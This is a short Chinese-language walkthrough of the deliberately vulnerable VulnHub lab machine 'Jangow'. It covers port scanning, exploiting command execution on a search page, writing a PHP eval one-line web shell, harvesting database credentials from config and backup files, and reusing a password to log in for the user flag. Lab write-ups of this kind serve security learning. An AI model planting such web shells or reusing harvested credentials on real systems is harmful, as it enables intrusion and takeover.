提示(主机ip分配问题)
因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的
所以我们可以在VirtualBox上打开
一、信息收集
发现开放了21和80端口,查看一下80端口
80端口:
检查页面后发现Buscar页面有个可疑的地方:
试下,有命令执行
直接写入一句话木马试一下:
echo '<?php eval($_POST["sain"]);' > shell.php
利用命令执行,看到有shell.php,说明上传成功
连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:
除此之外发现在/var/www/html下有一个./backup文件:
发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:
username = "jangow01"password = "abygurl69"
拿到了user_flag
